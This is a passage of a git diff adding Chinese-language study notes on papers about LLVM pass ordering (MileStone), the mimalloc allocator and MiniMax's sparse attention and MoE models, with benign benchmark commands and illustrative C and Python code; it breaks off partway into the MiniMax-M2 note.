exec_time_p=1.4, + energy_p=1.9, + energy_target=2.0, + mu=0.3, # 更偏执行时间 + beta=2.0, # 加重能耗约束 +) +print(f"terminal reward: {r:.4f}") +``` + +调 `mu` 可在「缩体积」与「抢速度」间滑动;调 `beta` 可强化「别超能耗预算」。RLMOE 通过在不同约束下探索,拼凑 Pareto 前沿上的多个里程碑点。 + +--- + +## 代码示例 3:用 clang 理解「pass 顺序」实验入口(可选动手) + +虽 MileStone 未开源完整框架,理解 phase ordering 可从手动试 LLVM pass 管道开始: + +```bash +# 查看默认 -O3 会跑哪些 pass(LLVM 17+) +opt -passes='default' -disable-output hello.bc -print-passes 2>&1 | head + +# 自定义 pass 顺序:先内联再循环展开(顺序不同结果可能不同) +opt -passes='inline,function(loop-unroll)' hello.bc -o tuned.bc + +# 对比代码体积与后续链接产物 +clang tuned.bc -o tuned -O0 +size tuned +``` + +MileStone 的价值在于:不用你对每个 benchmark 手工试几百条 `opt -passes=...`,而是由 RL 在 GNN 预测引导下自动搜索,且同时看时间/体积/能耗。 + +--- + +## 实验结论(论文摘要级) + +论文在标准 benchmark 上报告: + +- 能找到**强 Pareto 最优**解,优于固定 LLVM 优化级别及相关技术 +- 在**相同能耗预算**下,执行时间最多降低约 **45%** +- 比依赖固定启发式或单目标学习的方法,更能**准确满足能耗约束** + +(具体 benchmark 名称、基线对比细节见论文 §5 Experimental Results。) + +--- + +## 与相关工作的关系 + +| 方向 | 代表工作 | 与 MileStone 的差异 | +|------|----------|---------------------| +| RL + 编译 pass | Autophase (Haj-Ali et al.) | Autophase 偏 HLS/单目标;MileStone 强调 LLVM IR + **三目标** | +| GNN + pass 学习 | CompilerGym, ProGraML | 多依赖 profiling 奖励;MileStone 用 GNN **静态预测** 减 profiling | +| 多目标 pass 序列 | MLComp | 同样 RL+ML 估计,MileStone 强调 **CDFG + 自进化 DB + 能耗约束 Pareto** | +| 固定优化级别 | `-O1/-O2/-O3` | 只是搜索空间中极少数预设点 | + +读 MileStone 的最佳搭档:先理解 LLVM pass 管线,再看 **Autophase**(RL 排 pass 的开山)、**ProGraML**(程序图表示)、**MLComp**(多目标 pass 序列 + ML 性能估计)。 + +--- + +## 局限与开放问题 + +1. **GNN 预测误差**:RL 策略受 surrogate 质量上限;极端未见过的 IR 结构可能预测漂移。 +2. **训练成本**:RLDBG 仍需一定量真 profiling 建库;冷启动程序域与目标 CPU 时要重新积累数据。 +3. **动作空间抽象**:论文将决策建模为对 CDFG 节点赋 directive,与工业界完整 pass pipeline 的映射关系需读原文细节。 +4. **泛化到其他后端**:目前围绕 LLVM IR/CDFG;GPU kernel 编译器(XLA、TVM)的 phase ordering 是平行问题,架构可借鉴但图特征需重做。 + +--- + +## 零基础自检清单 + +读完本篇,你应该能回答: + +- [ ] 什么是 **phase ordering problem**?为什么 `-O3` 不能覆盖所有场景? +- [ ] **CDFG** 的节点和边分别表示什么? +- [ ] **GNNPP** 和 **RLMOE** 各解决什么子问题?为何要强绑定? +- [ ] **RLDBG** 在闭环里扮演什么角色? +- [ ] 论文中 **Pareto 最优** 与 **能耗约束** 如何同时体现? +- [ ] 终端奖励里 \(\mu\)、\(q\)、\(\beta\) 各控制什么权衡? + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.23435](https://arxiv.org/html/2605.23435v1) +- LLVM Pass 基础设施:[LLVM Passes](https://llvm.org/docs/Passes.html) +- Autophase(RL 排 HLS pass):[MLSys 2020](https://proceedings.mlsys.org/paper/2020/file/5b47430e24a5a1f9fe21f0e8eb814131-Paper.pdf) +- ProGraML(程序图表示):Cummins et al., 2021 +- MLComp(多目标 pass + ML 估计):[arXiv:2012.05270](https://arxiv.org/abs/2012.05270) + +--- + +## 一句话带走 + +**MileStone 把编译器优化排程变成「看图预测 + 强化学习寻 Pareto 前沿」:GNN 当廉价品菜师,RL 当听预算的排班经理,自进化数据库让两者越配合越准——在能耗约束下,比死磕 `-O3` 更能找到适合你设备的那道菜。** diff --git a/src/content/docs/papers/mimalloc-leijen-2019.md b/src/content/docs/papers/mimalloc-leijen-2019.md new file mode 100644 index 000000000..903d816be --- /dev/null +++ b/src/content/docs/papers/mimalloc-leijen-2019.md @@ -0,0 +1,268 @@ +--- +title: Mimalloc(Leijen 2019)— 用「分片空闲链表」让 malloc 又快又稳 +来源: https://www.microsoft.com/en-us/research/uploads/prod/2019/06/mimalloc-tr-v1.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 是什么 + +**mimalloc**(读作 *me-malloc*)是微软研究院 Daan Leijen、Ben Zorn、Leonardo de Moura 在 2019 年 APLAS 上发表的通用内存分配器(技术报告 MSR-TR-2019-18)。它最初为 **Lean** 与 **Koka** 两个引用计数函数式语言的运行时设计,后来成为 Windows、Firefox、CPython(可选)、Rust 生态里常见的 `malloc` 替代品。 + +日常类比:传统分配器像一家大超市的**中央退货台**——所有尺码的衣服(空闲块)混在一个大筐里,谁退货、谁拿货都要挤同一柜台。多线程时柜台前排长队,而且你刚买的衬衫和三个月前退的袜子可能被塞在一起,**cache locality** 很差。 + +mimalloc 的做法是: + +- 把退货筐按**货架区域**拆开(**free list sharding**:每个 *mimalloc page* 一条链,通常 64 KiB、只放同一 size class); +- 每个货架再摆**三个小筐**(**multi-sharding**:本线程释放、跨线程释放、已分配追踪各一条链); +- 店员按固定节奏偶尔离开「秒结账通道」做盘点(**temporal cadence**:延迟释放、跨线程回收、向 OS 还页)。 + +你写的 `malloc(32)` 多数时候只是:在当前线程的 mimalloc page 上从**本线程空闲链**弹出一个块——**无锁、无全局 size class 大链、争用天然分散**。 + +## 为什么重要 + +不理解这篇论文,下面几件事很难讲清楚: + +- 为什么 mimalloc 在 Redis 上比 tcmalloc 快约 **7%**、比 jemalloc 快约 **14%**(论文 benchmark),且在一组顺序/并发测试里曲线更「平」 +- 为什么 **Swift / Python / Lean** 这类大量小对象 + 引用计数的运行时,会专门和分配器「谈合作」(延迟减引用、内存压力时唤醒) +- 为什么现代分配器都在谈 **sharding**——jemalloc 的 arena、tcmalloc 的 per-CPU cache、mimalloc 的 page-local 三链表,是同一问题的不同答案 +- 为什么换 `LD_PRELOAD=libmimalloc.so` 有时比改业务代码还管用——热路径在分配器里 + +论文动机很具体:Lean/Koka 运行时**海量短命小分配** + **引用计数**,现有 jemalloc 仍不够快;还需要在分配器里挂钩 **deferred free**(大结构析构时把减引用推迟到「有内存压力」的时刻),避免长时间 STW。 + +## 核心概念 + +### 1. mimalloc page:比 OS 页更小的「货架」 + +在 64 位系统上,一个 **mimalloc page** 通常 **64 KiB**,内部只服务**一个 size class** 的块。这与 OS 的 4 KiB 页不同——它是分配器自己的管理粒度。 + +好处: + +| 维度 | 全局 per-size-class 一条链 | mimalloc page 局部链 | +|------|---------------------------|-------------------| +| 局部性 | 释放分散,下次分配可能很远 | 在同 page 内填满再换页,**时间上相邻的分配地址也相邻** | +| 碎片 | 大链混着各种生命周期的块 | page 空了就整块还给 OS(**eager purging**) | +| 争用 | 所有线程抢同一条链头 | 数千条小链,碰撞概率像「随机散列」 | + +### 2. Free list sharding(空闲链表分片) + +经典 jemalloc/tcmalloc:每个 size class 维护**一条**(或一组 central)空闲链表。 + +mimalloc:**每个 mimalloc page 各自一条空闲链**。`malloc` 优先在当前 page 分配,直到 page 满再向 segment 要新 page。`free` 把块还回**它所属 page** 的链——不会把远处 page 的空块和本地混在一起。 + +直觉:你在 A 区货架拿东西,退回来的也挂回 A 区挂钩,而不是扔到商场总服务台。 + +### 3. Free list multi-sharding(一页三条链) + +论文的核心创新:每个 page 不只有一条空闲链,而是 **三条**: + +| 链表 | 谁写入 | 典型操作 | 设计目的 | +|------|--------|----------|----------| +| **Local free** | 本线程 `free` | 链表头 push/pop | **热路径无锁** | +| **Thread free** | 其他线程 `free` | 单次 **CAS** 挂到该链 | 跨线程释放不抢本线程链 | +| **Used / allocated** | 分配器元数据 | 追踪已发出块 | 与空闲分离,便于维护 | + +跨线程 `free` 只需一次原子操作把块挂到目标 page 的 **thread free** 链,**不需要**和分配线程协调锁。全堆有成千上万条链,争用自然**打散**——论文把它类比成 skip list 里加「随机 oracle」降低结构化热点。 + +分配时:先吃 local free;不够则合并 thread free 到 local(按 **temporal cadence** 节奏做,不是每次分配都合并)。 + +### 4. Temporal cadence(时间节拍) + +若永远走「弹块 → 返回」的 fast path,**延迟维护**永远排不上队:thread free 堆着不合并、deferred RC 不跑、空 page 不还 OS。 + +mimalloc 在 fast path 里埋**可预测的节拍**(例如用计数器低位):每隔固定次数分配/释放,**故意**离开 fast path 做: + +- 把 thread free 合并进 local free; +- 处理 **deferred free** 队列(引用计数运行时); +- 回收空 page、 `madvise`/`decommit` 给 OS。 + +这样 worst-case 有界,又不会让维护逻辑「偶尔卡死一次」——对 Lean/Koka 的 **bounded wcat**(最坏情况分配时间)很重要。 + +### 5. Segment 与线程本地堆 + +多个 mimalloc page 组成 **segment**(通常 4 MiB 量级)。每个线程有 **thread-local heap**,分配默认只碰本线程的 page,减少跨线程元数据。 + +v2/v3 演进还引入 **abandoned segment** 回收、**first-class heap**(多堆区域、整堆销毁)等,但 2019 论文的主线仍是 **page-local sharding + 三链表**。 + +### 6. 面向引用计数运行时的钩子 + +论文花篇幅讨论:当 RC 减到 0 要释放大树时,可在分配器里 **defer**——把「递归减子节点引用」放进延迟队列,在 **malloc 压力**或 cadence 节拍时批量处理。这样: + +- 避免在业务线程上深度递归 free; +- 与 mimalloc 的「定期离开 fast path」自然对齐。 + +这也是 mimalloc 进入 **Swift、Python nogil 分支** 等讨论的原因:语言运行时不再把分配器当黑盒 `malloc`,而是**协作者**。 + +### 7. 与 jemalloc / tcmalloc 对照 + +| 维度 | jemalloc | tcmalloc | mimalloc | +|------|----------|----------|----------| +| 分片单位 | arena(MB 级) | per-CPU / per-thread cache + central | **mimalloc page(64 KiB)** | +| 空闲链粒度 | per arena × size class | per size class central + cache 链 | **per page × 三条链** | +| 跨线程 free | 进 arena 锁或 tcache 流转 | transfer cache / central | **目标 page 上单 CAS** | +| 空内存归还 | 可配置 | PageHeap 回收 | **page 空则 eager purge** | +| 代码规模 | 大 | 中 | **~10k LOC,易嵌入运行时** | + +## 代码示例 + +### 示例 1:零改代码替换系统 malloc + +mimalloc 可作为 `malloc`/`free` 的 drop-in 替换。Linux 上动态链接程序常用 `LD_PRELOAD`: + +```bash +# 构建你的程序(照常链接 libc) +cc -O2 -pthread -o bench bench.c + +# 对比:系统 malloc vs mimalloc +/usr/bin/time -f '%e sec maxrss=%MKB' ./bench +/usr/bin/time -f '%e sec maxrss=%MKB' \ + LD_PRELOAD=/usr/lib/libmimalloc.so ./bench + +# 打开 mimalloc 统计(版本不同选项名略有差异) +MIMALLOC_SHOW_STATS=1 LD_PRELOAD=libmimalloc.so ./bench +``` + +下面是一个多线程小对象风暴,能放大 **sharding** 与 **跨线程 free** 差异: + +```c +#include +#include +#include +#include + +#define N_THREADS 16 +#define ITERS 200000 + +static void *worker(void *arg) { + long id = (long)arg; + for (int i = 0; i < ITERS; i++) { + /* 48 B 很常见:落在独立 size class,内部碎片可控 */ + void *p = malloc(48); + if (!p) return NULL; + memset(p, (int)(id + i), 48); + + /* 故意让部分内存在别的线程 free:打 thread-free 链 + CAS 路径 */ + if ((i & 7) == 0) { + static void *stash[N_THREADS]; + if (stash[id]) free(stash[id]); + stash[id] = p; + } else { + free(p); + } + } + return NULL; +} + +int main(void) { + pthread_t tid[N_THREADS]; + for (long i = 0; i < N_THREADS; i++) + pthread_create(&tid[i], NULL, worker, (void *)i); + for (int i = 0; i < N_THREADS; i++) + pthread_join(tid[i], NULL); + puts("done"); + return 0; +} +``` + +**读这段代码时在发生什么**: + +1. 每线程第一次 `malloc` 绑定 thread-local heap,从当前 mimalloc page 的 **local free** 弹块。 +2. 同线程 `free` → 压回该 page 的 local free,**无锁**。 +3. `(i & 7) == 0` 时把块缓存在 `stash`,下一轮在同线程 `free` 上一块——仍 mostly local;若改成把指针交给**另一线程** `free`,则走 **thread free + CAS**,这正是 multi-sharding 要优化的路径。 +4. page 填满后换同 segment 新 page;segment 内无可用 page 时再向 OS 要内存。 +5. 用 mimalloc 跑通常比 glibc ptmalloc 锁争用少;论文在类似并发 micro-benchmark 上相对 jemalloc/tcmalloc 更稳。 + +### 示例 2:First-class heap 与按区域批量释放 + +mimalloc 提供 **heap 对象**(不是只认全局 `malloc`)。游戏引擎、JIT、区域分配器常需要「这一坨一起扔」: + +```c +#include +#include +#include + +int main(void) { + /* 独立堆:与默认堆隔离,可整堆销毁 */ + mi_heap_t *heap = mi_heap_new(); + + char *a = mi_heap_malloc(heap, 128); + char *b = mi_heap_malloc(heap, 256); + strcpy(a, "shard-A"); + strcpy(b, "shard-B"); + + /* 模拟:一个请求作用域结束,不必逐个 free */ + mi_heap_destroy(heap); /* 一次释放 heap 内全部块 + 对应 page */ + + /* 默认堆仍可用 */ + void *x = mi_malloc(64); + mi_free(x); + return 0; +} +``` + +编译链接(已安装 mimalloc 开发包时): + +```bash +cc -o heap_demo heap_demo.c -lmimalloc +./heap_demo +``` + +**设计要点**: + +- `mi_heap_malloc` 仍走同一套 page sharding,只是 **page 归属不同 heap**; +- `mi_heap_destroy` 比 N 次 `free` 少碰全局结构,适合 **AST 遍历、编译 Pass 临时 arena**; +- v3 起堆可从**任意线程**分配(true first-class),便于线程池里按任务域划堆。 + +### 示例 3:观察 deferred / 安全模式(概念验证) + +论文里的 **deferred free** 与 **secure mode** 在应用层 API 上体现为选项与心跳钩子。下面片段展示**如何打开安全构建**(生产环境慎用,约 10% 开销)及打印统计的思路——具体宏因版本而异,以[官方文档](https://microsoft.github.io/mimalloc)为准: + +```c +#include +#include + +int main(void) { + void *p = mi_malloc(1024); + mi_free(p); + + /* 进程退出前查看分配器统计:page 数、峰值、桶分布 */ + mi_stats_print(NULL); + return 0; +} +``` + +Secure 构建(`MI_SECURE`)会加密空闲链、加 guard page、缓解 double-free——对应论文对**分配器即安全边界**的讨论,与性能模式分开。 + +## 性能与工程结论(论文摘要) + +论文在 Redis、larson(多线程分配测试)、alloc-test 等基准上报告: + +- 相对 **tcmalloc** 约 **+7%**(Redis) +- 相对 **jemalloc** 约 **+14%**(Redis) +- 顺序与并发场景多数领先或持平,曲线**方差小**——「没有特别慢的 benchmark」对线上服务很重要 + +实现侧亮点: + +- **~10k 行 C**,结构一致,适合嵌进语言运行时改钩子; +- **eager page purging**:空 page 尽快 `decommit`,长跑服务 RSS 更友好; +- 已被 **Lean 4、Koka、mi_malloc crate(Rust)** 等直接使用或可选链接。 + +## 常见误区 + +1. **「mimalloc page = 4 KiB OS 页」** — 错。64 KiB 是分配器逻辑页,和 TLB 页是两层概念。 +2. **「分片一定更省内存」** — 不一定。局部性变好、purge 更积极常**降 RSS**,但元数据(每 page 三条链头)有少量开销;要以 workload 实测为准。 +3. **「换 mimalloc 就不用管跨线程 free」** — multi-sharding 把 CAS 争用打散,**不是**消灭跨核流量;最佳仍是「谁分配谁释放」或 per-thread arena。 +4. **「只适用于 RC 语言」** — 论文动机来自 Lean/Koka,但 C/C++ 通用程序同样受益;RC 钩子是可选项。 + +## 延伸阅读 + +- 技术报告 PDF:[mimalloc-tr-v1.pdf](https://www.microsoft.com/en-us/research/uploads/prod/2019/06/mimalloc-tr-v1.pdf) +- 开源实现与 README:[microsoft/mimalloc](https://github.com/microsoft/mimalloc) +- 同系列对比笔记:本库 [jemalloc(Evans 2006)](./jemalloc-evans-2006.md)、[TCMalloc](./tcmalloc-google-2007.md) +- APLAS 2019 会议版:Springer LNCS 11893 + +## 小结 + +mimalloc 把「空闲链表」从**全局 per-size-class** 拆成 **per-page**,再在每页上拆成 **local / thread / used** 三条链,用 **temporal cadence** 把维护任务嵌进可预测的节拍。对零基础读者,只需记住类比:**别用大超市总退货台,改成每货架三个小筐,店员按固定节奏盘点**——这就是 *Free List Sharding in Action* 的「Action」:设计直接落在热路径代码与论文 benchmark 数字上。 diff --git a/src/content/docs/papers/mini-max-sparse-attention.md b/src/content/docs/papers/mini-max-sparse-attention.md new file mode 100644 index 000000000..78b80120a --- /dev/null +++ b/src/content/docs/papers/mini-max-sparse-attention.md @@ -0,0 +1,217 @@ +--- +title: MiniMax Sparse Attention — 用 Top-k 块选择把 1M 上下文塞进 GPU +来源: 'Lai et al., "MiniMax Sparse Attention," arXiv 2606.13392, 2026' +日期: 2026-06-13 +分类: 机器学习 +子分类: LLM系统 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +MiniMax Sparse Attention(简称 **MSA**)是 MiniMax 在 2026 年 6 月发表的一种**块级稀疏注意力**机制,目标是让 109B 参数的大模型以 1M(一百万)token 的上下文长度推理,同时保持和标准 GQA 一样的精度。日常类比:标准 attention 像让你在一百万本书里找答案——你要翻每一页(O(L²) 计算);MSA 像先让一个"索引员"(Index Branch)快速扫一遍,挑出最可能有关的几千本,**只在这几千本里精读**。 + +它做了三件事: + +1. **Index Branch(索引分支)**:一个轻量级模块,把 KV cache 切成固定大小的 block,给每个 block 打分,然后对每个 GQA group 独立选出 Top-k 个高得分 block +2. **Main Branch(主分支)**:只做标准 attention,但**只在选中的 block 之间算**——不选中的 block 直接跳过 +3. **GPU 协同设计**:配套的推理 kernel 用 exp-free Top-k 和 KV-outer sparse attention 提高 tensor core 利用率 + +结果:在 1M 上下文下,每 token attention 计算量降低 28.4 倍,配合 kernel 在 H800 上获得 14.2 倍 prefill 和 7.6 倍 decoding 加速。已开源推理 kernel(github.com/MiniMax-AI/MSA),生产模型 MiniMax-M3(109B,原生多模态)在 HuggingFace 可下载。 + +## 为什么重要 + +- **1M 上下文不是噱头**:agent 工作流、代码仓库级推理、持久记忆都要求模型同时"看到"几十到上百万 token,标准 softmax attention 的 O(L²) 复杂度在部署规模下完全不可行 +- **稀疏 attention 终于兼顾了精度和速度**:之前的方案(如 [[reformer-2020]] 的 LSH)是近似,有精度损失;MSA 在选中 block 内做**精确 attention**,在 109B 模型上"和 GQA 打平" +- **GQA + 稀疏 = 工业友好**:MSA 不是从零发明注意力,而是在 GQA 之上叠一层轻量选择机制,和现有的多卡并行策略天然兼容 +- **从算法到 kernel 端到端设计**:不只是论文算法,还配套了 GPU kernel,exp-free Top-k 和 block-granular access 都是为 tensor core 定制的 + +## 核心概念 + +### 1. Block 化 KV Cache + +标准 attention 每次算 Q × K^T 时,K 是所有过去的 token。MSA 先把 KV pairs 按固定大小(比如 64 或 128 tokens)切块。每个 block 内部是密集的,block 之间是稀疏的: + +``` +KV Cache (L tokens): +[B0] [B1] [B2] [B3] ... [B(n-1)] +每个 block 64 tokens, 1M / 64 = 约 15625 个 blocks +``` + +### 2. Index Branch — 轻量级"索引员" + +对每个 query block,Index Branch 用一个轻量打分函数计算它和每个 KV block 的相关性得分。关键设计: + +- 打分函数要**极快**——不能比正式 attention 还重 +- 按 GQA group 独立选 Top-k —— 不同 group 可以关注不同区域 +- 选出来的 block 集合就是 Main Branch 要算的范围 + +### 3. Top-k 选择的 exp-free 优化 + +标准 softmax 里的 exp 在 GPU 上很慢。MSA 做了 exp-free Top-k: + +- 打分阶段不用 exp,直接用线性/余弦得分排序 +- Top-k 排序本身不需要 softmax 的数值稳定性——选 top 是 order-preserving 的 + +### 4. KV-outer sparse attention + +Main Branch 的 attention 计算也是稀疏化的。传统 attention 是 Q_i × K_j(逐 token dot product),KV-outer 把它改成 block 级别的 outer product: + +``` +Q_block (b × d) × KV_block^T (d × b) = 结果 (b × b) +``` + +这样每次矩阵乘法覆盖一个 block 对,tensor core 利用率更高。 + +## 代码示例 + +### 示例 1:MSA 的前向流程(伪代码) + +```python +def mini_max_sparse_attention(Q, KV_cache, GQA_groups, top_k=16, block_size=64): + """ + MiniMax Sparse Attention 主流程 + + Q: (num_heads, seq_len, head_dim) + KV_cache: list of blocks, each (num_kv_heads, block_size, head_dim * 2) + GQA_groups: list of head index lists, 每个 group 共享一组 KV + top_k: 每个 group 选多少个 block + block_size: 每个 block 的 token 数 + """ + num_kv_blocks = len(KV_cache) + + # --- Phase 1: Index Branch — 打分 & 选块 --- + # 对每个 GQA group,选 top-k 个高得分 KV block + selected_blocks = [] # list of [num_heads, top_k] + + for group_heads in GQA_groups: + # 取 group 内第一个 head 的 Q 和所有 KV blocks 做轻量打分 + q_group = Q[group_heads[0]] # (seq_len, head_dim) + scores = index_score(q_group, KV_cache) # (seq_len, num_kv_blocks) + + # Top-k:选得分最高的 k 个 block + _, indices = torch.topk(scores, top_k, dim=-1) # (seq_len, top_k) + selected_blocks.append(indices) + + # --- Phase 2: Main Branch — 精确稀疏 attention --- + # 只在选中的 block 上算 attention + output = torch.zeros_like(Q) + + for group_idx, group_heads in enumerate(GQA_groups): + indices = selected_blocks[group_idx] # (seq_len, top_k) + + for head in group_heads: + q = Q[head] # (seq_len, head_dim) + attn_weights = [] + + for t in range(q.shape[0]): + block_ids = indices[t] # (top_k,) + # 取出对应 block 的 K, V + k_selected, v_selected = gather_blocks(KV_cache, block_ids, block_size) + + # 标准 attention:(1, head_dim) × (head_dim, k*block_size) + logits = q[t] @ k_selected.T # (1, top_k * block_size) + weights = torch.softmax(logits / sqrt(head_dim), dim=-1) + + # 加权求和 + output[head, t] = weights @ v_selected # (head_dim,) + + return output +``` + +### 示例 2:Index Branch 的轻量打分函数 + +```python +def index_score(q: torch.Tensor, kv_blocks: list, dim_reduction=8) -> torch.Tensor: + """ + Index Branch 打分——要极快,不能有 exp + + q: (seq_len, head_dim) + kv_blocks: list of (block_size, head_dim * 2), 每个 block 含 K 和 V + dim_reduction: 降维维度,进一步加速 + + 返回: (seq_len, num_blocks) 的得分矩阵 + """ + seq_len, head_dim = q.shape + num_blocks = len(kv_blocks) + scores = torch.zeros(seq_len, num_blocks, device=q.device) + + # 对 KV blocks 预计算统计量(只需一次) + block_means = [] + block_norms = [] + + for block in kv_blocks: + k_block = block[:, :head_dim] # (block_size, head_dim) + # 预取 block 的 mean 和 norm,打分时不再遍历每个 token + mean = k_block.mean(dim=0) # (head_dim,) + norm = mean.norm() + 1e-8 + block_means.append(mean) + block_norms.append(norm) + + # 降维投影(学习来的投影矩阵,矩阵乘法但维度小) + W_proj = torch.randn(head_dim, dim_reduction, device=q.device) + q_proj = q @ W_proj # (seq_len, dim_reduction) + + # 批量打分:余弦相似度风格 + for b_idx, (mean, norm) in enumerate(zip(block_means, block_norms)): + k_mean_proj = mean @ W_proj # (dim_reduction,) + dot = q_proj @ k_mean_proj.T # (seq_len, 1) + scores[:, b_idx] = dot.squeeze(-1) / norm + + return scores +``` + +## 踩过的坑 + +1. **Top-k 的 k 值敏感**:k 太小会漏掉关键信息(精度下降),k 太大会稀释稀疏收益。论文在 1M 上下文下用 top-k=16 左右(每个 head 对应 16 × 64 = 1024 个 KV tokens),但不同长度和模型需要重调。 + +2. **Index Branch 太复杂会反噬**:打分模块如果本身很重,就抵消了稀疏带来的节省。MSA 刻意做得非常轻量——降维投影 + 预计算的 block 均值打分,FLOPs 远低于正式 attention。 + +3. **GQA group 间不平衡**:不同 GQA group 可能关注上下文的不同区域(比如一个 group 看开头,另一个看结尾),统一 top-k 不够,所以 MSA 做 group-specific 选择。 + +4. **KV-outer 的 block 边界效应**:attention 本质上是对每个 token 独立算的,block 切分会在边界处引入不连续性。MSA 通过 block 内做完整 attention 缓解这个问题,但 block 间的跳跃仍可能造成局部精度下降。 + +## 适用 vs 不适用场景 + +**适用**: + +- 长上下文 LLM 推理(100K - 1M token) +- 多模态模型处理超长输入(视频 / 长文档) +- 需要部署在多种 GPU 上的生产系统(MSA 刻意追求"简单可部署") + +**不适用**: + +- 短上下文(< 32K)—— overhead 大于收益 +- 对精度零容忍的任务——稀疏选择有信息丢失风险 +- 已有 FlashAttention + 充足显存的场景——如果显管够,标准 attention 够快就没必要上稀疏 + +## 历史小故事(可跳过) + +- **2020**:Reformer(LSH)/ Longformer(滑窗)/ BigBird(随机 + 全局)把"稀疏 attention"推上主流 +- **2021-2023**:GQA(Grouped Query Attention)被提出,用少量 KV heads 共享大幅提升推理吞吐,成为 LLM 标配 +- **2024**:FlashAttention 不改变算法,只优化 GPU 数据搬运,精确 + 快,成为工业新基准 +- **2026-06**:MiniMax 把 GQA 和块级稀疏 attention 结合,用 Index Branch + Top-k 选择实现 28.4 倍计算量削减,同时在 109B 大模型上验证精度不掉。这是**首个在 109B 级别生产模型上验证的 block-sparse + GQA 方案**。 + +## 学到什么 + +1. **稀疏 attention 的第三条路**:不近似(像 Reformer LSH)、不只靠 IO 优化(像 FlashAttention),而是做**精确但稀疏**——选少量块做完整 attention +2. **算法 + kernel 必须协同设计**:MSA 的 exp-free Top-k 和 KV-outer 不是附带的,是从第一天就为 tensor core 定制的 +3. **GQA 是稀疏 attention 的天然底座**:GQA 已经把 KV heads 分组了,每组独立选 Top-k 是顺水推舟 +4. **生产验证比论文指标更重要**:MSA 不只是 bench mark 数字,而是跑在 109B 多模态模型上并开源,这种级别验证在 sparse attention 里很少见 + +## 延伸阅读 + +- 论文:[MiniMax Sparse Attention (arXiv 2606.13392)](https://arxiv.org/abs/2606.13392)(30 页,14 张图) +- 推理 kernel:[github.com/MiniMax-AI/MSA](https://github.com/MiniMax-AI/MSA) +- 生产模型:[MiniMax-M3 (109B, 原生多模态)](https://huggingface.co/MiniMaxAI/MiniMax-M3) +- [[attention]] —— Attention Is All You Need,MSA 改造的对象 +- [[reformer-2020]] —— 早期稀疏 attention,用 LSH 近似,精度有损失 +- [[flashattention-2]] —— 精确 attention 的 IO 优化版,和 MSA 思路互补 + +## 关联 + +- [[attention]] —— 标准 softmax attention,MSA 在它的上面加了一层稀疏选择 +- [[reformer-2020]] —— 前辈,LSH 近似 attention,MSA 走精确但稀疏路线 +- [[flashattention-2]] —— 精确 + IO 优化,和 MSA 的思路互补:MSA 减少计算量,FlashAttention 加速现有计算 +- [[longformer-2020]] —— 另一个稀疏 attention 方案,用滑窗 + 全局 token diff --git a/src/content/docs/papers/minimax-m2-series.md b/src/content/docs/papers/minimax-m2-series.md new file mode 100644 index 000000000..c34f01f62 --- /dev/null +++ b/src/content/docs/papers/minimax-m2-series.md @@ -0,0 +1,336 @@ +--- +title: "The MiniMax-M2 Series: Mini Activations Unleashing Max Intelligence" +来源: https://arxiv.org/abs/2605.26494 +日期: 2026-06-13 +分类: 其他 +子分类: llm +provenance: pipeline-v3 +--- + +# MiniMax-M2 系列学习笔记 + +## 一、一句话总结 + +MiniMax-M2 是一系列"混合专家(MoE)"语言模型,核心思想是:**用极少的激活参数,做出最前沿的智能表现**。旗舰模型 M2.7 总参 2299 亿,但每个 token 只激活约 98 亿——相当于一个 2000 人团队里,每次只叫 100 个人来干活,却能达到和更大模型相当的效果。 + +--- + +## 二、核心概念:什么是"混合专家"(MoE)? + +### 2.1 日常类比:餐厅里的厨师团队 + +想象一家超大餐厅,有 256 位厨师(这就是 256 个"专家"),但每个菜上桌时,餐厅并不会让所有厨师同时炒菜——那太浪费了。 + +相反,餐厅有一个"调度员"(门控网络),每道菜只挑最合适的 8 位厨师来制作。比如一道川菜,调度员会叫川菜厨师;一道甜点,叫甜品厨师。 + +- **总人数**:256 位厨师 = 模型的 2299 亿总参数 +- **每次出菜人数**:8 位厨师 = 每个 token 只激活 98 亿参数 +- **调度员**:sigmoid 门控网络,决定叫哪 8 位 + +这样做的好处是:**模型可以非常大(知识量大),但推理成本很低(每次只算一部分)**。 + +### 2.2 与传统 Dense 模型的对比 + +| 特性 | Dense 模型(如 Llama 3 70B) | MoE 模型(如 M2) | +|------|---------------------------|-------------------| +| 总参数 | 700 亿 | 2299 亿 | +| 每次激活 | 700 亿 | 98 亿 | +| 推理速度 | 较慢 | 较快(因为只算 98 亿) | +| 知识容量 | 较小 | 更大(256 个专业领域) | + +--- + +## 三、M2 的三个关键创新 + +### 3.1 创新一:智能体驱动的数据流水线 + +传统大模型训练数据主要来自网页、书籍等静态内容。M2 的不同之处在于:它的训练数据大部分来自**模型自己在真实环境中完成任务的过程记录**。 + +比如让模型去修一个 GitHub 上的 bug,跑在 Docker 容器里,测试通过了就算一条有效数据。这种"做过的事情"比"读过的文字"更有价值。 + +具体包括四个方向: + +1. **智能体编码(Agentic Coding)**:从 GitHub 拉取真实的 bug 修复任务,自动生成 Docker 环境,让模型去修 +2. **智能体协作(Agentic Cowork)**:让模型做深度搜索、操作 Excel、生成 PPT 等办公任务 +3. **推理密集型任务**:数学题、科学问答 +4. **通用对话与写作**:保持基础语言能力 + +### 3.2 创新二:Forge — 专为智能体设计的强化学习系统 + +强化学习(RL)是让模型通过"试错"来变聪明的方法。但传统 RL 是为简单游戏设计的,而智能体任务可能涉及成百上千步操作、耗时从几秒到几小时不等。 + +Forge 解决了三个矛盾: + +- **吞吐量**:想处理得越快越好 +- **稳定性**:想训练过程不崩溃 +- **灵活性**:想支持各种各样的智能体架构 + +它通过三个解耦模块实现: + +``` +┌─────────────┐ ┌──────────────────┐ ┌─────────────────┐ +│ Agent 端 │────▶│ 中间件抽象层 │────▶│ 训练/推理端 │ +│ (产生轨迹) │ │ (Gateway + 数据池) │ │ (CISPO 梯度更新) │ +└─────────────┘ └──────────────────┘ └─────────────────┘ +``` + +### 3.3 创新三:自我进化(Self-Evolution) + +最新的 M2.7 已经能**自己调试自己的训练过程**。当训练出现异常时,M2.7 会读取日志、定位问题、修改自己的配置文件,然后重新运行。在内部测试中,它能吸收每天 30%-50% 的人工迭代工作量。 + +--- + +## 四、关键技术细节(带代码示例) + +### 4.1 MoE 的门控机制 + +M2 不使用传统的 softmax 门控(所有专家得分加起来必须等于 1),而是使用 **sigmoid 门控**——每个专家独立决定是否被激活。 + +```python +# 简化的 MoE 前向传播示意 +import torch +import 